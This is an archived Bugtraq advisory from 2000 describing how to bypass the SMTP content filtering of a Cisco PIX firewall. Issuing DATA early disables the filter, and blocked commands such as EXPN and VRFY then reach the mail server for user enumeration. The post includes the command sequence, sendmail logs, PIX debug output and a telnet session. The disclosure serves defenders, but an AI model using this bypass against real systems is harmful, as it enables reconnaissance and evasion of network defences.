[LWN Logo]
[Timeline]
Date:         Tue, 19 Sep 2000 18:27:49 +0200
From: naif <naif@INET.IT>
Subject:      Cisco PIX Firewall (smtp content filtering hack)
To: BUGTRAQ@SECURITYFOCUS.COM

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

How to escape "fixup smtp" of  Cisco Pix Firewall:

The Cisco Pix Firewall normally restrict some protocol command(http,ftp,smtp) and manage
multisession protocol(h323, ftp,sqlnet) .
I made some test on a BSDI3.0 running sendmail9 placed in the dmz .
The Pix version it's the latest, 5.2(1)... here the output of "show ver"
=====================================================
Cisco Secure PIX Firewall Version 5.2(1)

Compiled on Tue 22-Aug-00 23:35 by bhochuli

pixtest1 up 22 days 5 hours

Hardware:   SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB

0: ethernet0: address is 00d0.b790.41a5, irq 11
1: ethernet1: address is 00d0.b790.54d4, irq 10
2: ethernet2: address is 00e0.b601.d289, irq 15
3: ethernet3: address is 00e0.b601.d288, irq 9
4: ethernet4: address is 00e0.b601.d287, irq 11
5: ethernet5: address is 00e0.b601.d286, irq 10

Licensed Features:
Failover:       Enabled
VPN-DES:        Enabled
VPN-3DES:       Enabled
Maximum Interfaces:     6
Cut-through Proxy:      Enabled
Guards:         Enabled
Websense:       Enabled
Throughput:     Unlimited
ISAKMP peers:   Unlimited
=======================================================
The Pix when a new connection are established use his fixup filter to nullify every command
that aren't in his "allowed list" (such as HELO,MAIL FROM:,RCPT TO:,DATA,RSET,QUIT)
For example, for the "security trought obscurity" concept he rewrite the banner of
the original MTA.
This is a sendmail...

220 *********************************************************2000 ***0******0200 ******

Now,  pix  nullify help command, and if i write a e-mail to my friend asking for ''help'', it should drop
the line on wich i write "help".
So, Cisco Pix Firewall, after "data" command, until "<CR><LF><CR><LF>.<CR><LF>" disable the fixup .
Now what appens if i don't complete the e-mail, or i immediatly type "data" in place of normal
"helo, mail from,rcpt to,data, quit" ?
Pix disable the fixup and give me a direct channel to the MTA without doing content filtering.

Here an example of what i could do exploiting this bug:
helo ciao
mail from: pinco@pallino.it
data                                 ( From here pix disable fixup)
expn guest			     ( Now i could enumerate user
vrfy oracle				and have access to all command)
help
whatever command i want
quit

Greeting to Cisco and it's Security Products !

Here log of my test...

- - Ip of the client: 10.10.10.10
- - Public Ip of the Server: 10.10.10.2
- - Private Ip of the Server: 172.16.1.2


=====
The sendmail log:

Sep 19 14:06:19 testbox sendmail[14163]: NOQUEUE: Authentication-Warning: testbox.test.it: [10.10.10.10] didn't use HELO protocol
Sep 19 14:07:36 testbox sendmail[14164]: NOQUEUE: [10.10.10.10]: expn pinco
Sep 19 14:08:03 testbox sendmail[14165]: NOQUEUE: [10.10.10.10]: vrfy pallino
Sep 19 14:08:50 testbox sendmail[14163]: OAA14163: from=pix@il.firewall.cattivo.it, size=0, class=0, pri=0, nrcpts=0, proto=SMTP, relay=[10.10.10.10]



=====
Here the OutPut of "debug fixup tcp" on the pix:

        tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        tcp: SYN out rcvd
        tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        tcp: exiting embyonic
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: unknown command
        smtp: X-ing ciao pix mi vuoi rispondere?

smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: help command
        smtp: nullify <help> command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: mail command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
        smtp: data command
        smtp: entering data mode

###### From here the pix think that i'm writing the e-mail body, so disable fixup
###### and i could inject my malicious command without having them nullified.

smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/1302)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/1302)




Here the telnet session:

naif:~# telnet  10.10.10.2 25
Trying 10.10.10.2...
Connected to 10.10.10.2.
Escape character is '^]'.
220 *********************************************************2000 ***0******0200 ******
ciao pix mi vuoi rispondere?
500 Command unrecognized: "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"
help
500 Command unrecognized: "XXXX"
mail from: pix@il.firewall.cattivo.it
250 pix@il.firewall.cattivo.it... Sender ok
data
503 Need RCPT (recipient)

#### LOOK, FROM HERE FIXUP IT'S DISABLED :)))

help
214-This is Sendmail version 8.9.1
214-Topics:
214-    HELO    EHLO    MAIL    RCPT    DATA
214-    RSET    NOOP    QUIT    HELP    VRFY
214-    EXPN    VERB    ETRN    DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214-    sendmail-bugs@sendmail.org.
214-For local information send email to Postmaster at your site.
214 End of HELP info
expn pinco
550 pinco... User unknown
vrfy pallino
550 pallino... User unknown


The End

Greeting to bolo for the PIX and the BSDI box :)
Kiss to my love NaiL^d0d :****


naif

e-mail:`echo "donlayiufhg@wiltoragpyzagvcm.wmdnehhqrstzwr" | tr -d \
              'bdghlmoqrsuvwzy'`

:pp

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: For info see http://www.gnupg.org
Filter: gpg4pine 4.1 (http://azzie.robotics.net)

iD8DBQE5x5QLdK5I1NnlcMYRAscOAKCv+DvZ3mx4+7UT6LpFyuEQNlD57gCfRJoB
2FEU8a6f1ZhtmDq82pOh3nE=
=0UD1
-----END PGP SIGNATURE-----